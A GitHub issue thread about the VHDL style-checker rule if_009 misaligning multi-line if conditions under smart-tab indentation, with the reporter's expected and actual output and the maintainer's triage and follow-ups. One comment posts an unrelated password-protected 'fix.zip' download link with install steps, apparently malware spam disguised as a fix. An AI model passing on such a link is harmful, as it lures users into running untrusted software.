jeremiah-c-leary/vhdl-style-guide #1218: if_009 with smart tabs indentation wrong output

magborresen, 2024-08-26:
**Environment**
VSG Version 3.23.0
Environment VSCode 1.92.2 on Windows 10

**Describe the bug**
When using the if_009 rule to align if statements that have multi-line boolean expressions while using smart_tabs with 4 spaces for indentation, the output is incorrect. It does not matter how the conditions of if_009 is set.

**To Reproduce**
`if_009:
    align_left: 'yes'
    align_paren: 'no'
`

**Expected behavior**
_Expected Output:_
`				when state_lo_active =>

					if pwm = '0' or force_lo_pulse = '1' then
						oc_lock <= '0';
					end if;

					if hi_locked = '1' or oc_lock = '1' or do_ls_on_fast = '1' then
						state_locked <= '1';
					else
						state_locked <= '0';
					end if;

					if over_current_lo_fast = '1' then
						state    <= state_dt_init_hi;
						hi_start <= '1';
						oc_lock  <= '1';
					elsif over_current_hi_fast = '0' and lo_mpw_end = '1' and state_locked = '0' and
	                                                                            (pwm = '1' or force_hi_pulse = '1') then
						state    <= state_dt_init_hi;
						hi_start <= '1';
						oc_lock  <= '0';
					end if;`

_Actual Output:_
`				when state_lo_active =>

					if pwm = '0' or force_lo_pulse = '1' then
						oc_lock <= '0';
					end if;

					if hi_locked = '1' or oc_lock = '1' or do_ls_on_fast = '1' then
						state_locked <= '1';
					else
						state_locked <= '0';
					end if;

					if over_current_lo_fast = '1' then
						state    <= state_dt_init_hi;
						hi_start <= '1';
						oc_lock  <= '1';
					elsif over_current_hi_fast = '0' and lo_mpw_end = '1' and state_locked = '0' and
	  (pwm = '1' or force_hi_pulse = '1') then
						state    <= state_dt_init_hi;
						hi_start <= '1';
						oc_lock  <= '0';
					end if;`

**Screenshots**
[image]

**Additional context**
I have not tested if this happens if the if statement is not already indented.

qlqw233, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

jeremiah-c-leary, 2024-10-13:
Evening @magborresen ,

I was able to duplicate the issue and will be moving this issue into the triaged state.

Regards,

--Jeremy

jeremiah-c-leary, 2025-01-25:
Morning @magborresen ,

It took me a while, but I believe I have a fix for this issue.  Could you check out branch `issue-1218` and let me know if it resolves the issue for you?

Thanks,

--Jeremy

jeremiah-c-leary, 2025-03-02:
Afternoon @magborresen ,

Just wanted to ping you to see if you were able to validate the fix for this issue.

Thanks,

--Jeremy

magborresen, 2025-03-27:
Hi @jeremiah-c-leary 

Sorry for the long response time. I have not been working with the tool for a while, so I haven't been able to verify yet. I will try to do it next week so we can close the issue.

Thanks for taking the time to look at it!

Magnus

jeremiah-c-leary, 2025-06-29:
Afternoon @magborresen,

Just wanted to ping you to see if you were able to validate the fix for this issue.

Thanks,

--Jeremy